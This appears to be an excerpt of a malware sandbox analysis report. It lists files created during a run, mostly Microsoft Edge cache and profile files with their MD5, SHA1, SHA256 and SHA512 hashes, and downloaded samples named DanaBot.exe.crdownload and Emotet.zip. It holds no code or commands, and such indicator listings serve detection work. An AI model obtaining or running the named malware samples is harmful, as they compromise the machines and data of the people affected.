C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\2\CacheStorage\index.txt

MD5 3d808252a67266ad038ea9e05fe325de
SHA1 6d1c39708e40e95bdb7fb3ea6bc91cf43cd7abf1
SHA256 4d415b05a71d85889c56c52e4c91a33d3d2477afbdf9fec3efcd471ca38a53aa
SHA512 1cea36f795648d06b3ffa39df852270a3144c90f95d386b766463814737a00dda5aa376ee7537e3f155569977cb130457057cdb91b7fe8395ba9a9d880a7d325

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\2\CacheStorage\index.txt~RFe5e5cb4.TMP

MD5 892e458ef1476ac2e2d85e9740f881f7
SHA1 b79799798320c8ac61150087b14de74c01ed6674
SHA256 f00624a269e3d08be97d19d39f38012931363c9d10a387563d77e1604900153f
SHA512 86d24788e55831165014b4a1625753b818843d93530bd5ca008a32d1b769e7c017726fe0c35d8250ded922ca5a4d34e8bf13ffa122ed91444f518825dd67f89d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 22551d72e4cc7d0ba995c3993620da4a
SHA1 386de6159268ce6ff2411b0c8ee26851c7ae037f
SHA256 46887716e0c3496aa751ad53efb07714afb51cc4ad2d0e60f43549b253b616ae
SHA512 348543fea1b84094a7030ed29c9a1bc3a3e93ffa24607a7adaba3944a4587f85012d787e538615ddbb4133657dddf6622e53d651aaace9625c11c368fb170ae4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 704398457cb42d514204fc139cd6f4f4
SHA1 289f2d934dd30904cfdd51fbb1e9f939470c555a
SHA256 d046ceb25e45a709b6c758ca054b02b3e5f298a2f869fa15326e5e7e9a265ec5
SHA512 ca2994c7070af8a3866d15a50f829152e81b68401a51aba7c9a4afce4ac52b9f75aef002eaf76cfac55688051dd4eaa6d72b8d55b9089f1fca09ac141b4b5ebd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 049daf7df4181ab63b6b2cb3b40bd70a
SHA1 12173641a74edd27236d163fb2592dd6f64f10b5
SHA256 74e43f6f71eb638a4e329ac374c495508556069b56a0ff605c3e3d33d300d15e
SHA512 0e2db85d95d006bb05b9778f32ee403051d062e0ff5f9fdb540c4abbb920a47d034963aebb6bbd360656535798317b58e7af02ebe6113d4cff58c037f338b6ad

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_536417775\manifest.json

MD5 578c9dbc62724b9d481ec9484a347b37
SHA1 a6f5a3884fd37b7f04f93147f9498c11ed5c2c2d
SHA256 005a2386e5da2e6a5975f1180fe9b325da57c61c0b4f1b853b8bcf66ec98f0a0
SHA512 2060eb35fb0015926915f603c8e1742b448a21c5a794f9ec2bebd04e170184c60a31cee0682f4fd48b65cff6ade70befd77ba0446cc42d6fe1de68d93b8ea640

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 6640a5e8de164dc093d4c5a631532455
SHA1 f1eeacd4f5d8a08ad2433d8694225753cf0ec9f4
SHA256 89e38712636642deacb9bbe1c17d8fdf7f5054a475a3385117a26a9551951083
SHA512 9de934ac95e67ae38f22c4868f92fed463e2dfeffd25a1855a9b20a38a42334d31a0067a6ccef39fe6cfe771e5167fca52a69a8a0da508185931c98f0062bf3b

C:\Users\Admin\Downloads\DanaBot.exe.crdownload

C:\Users\Admin\Downloads\Emotet.zip

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\2C83C73D.wmf

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\39086C1A.wmf

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ltietonv.1tg.ps1
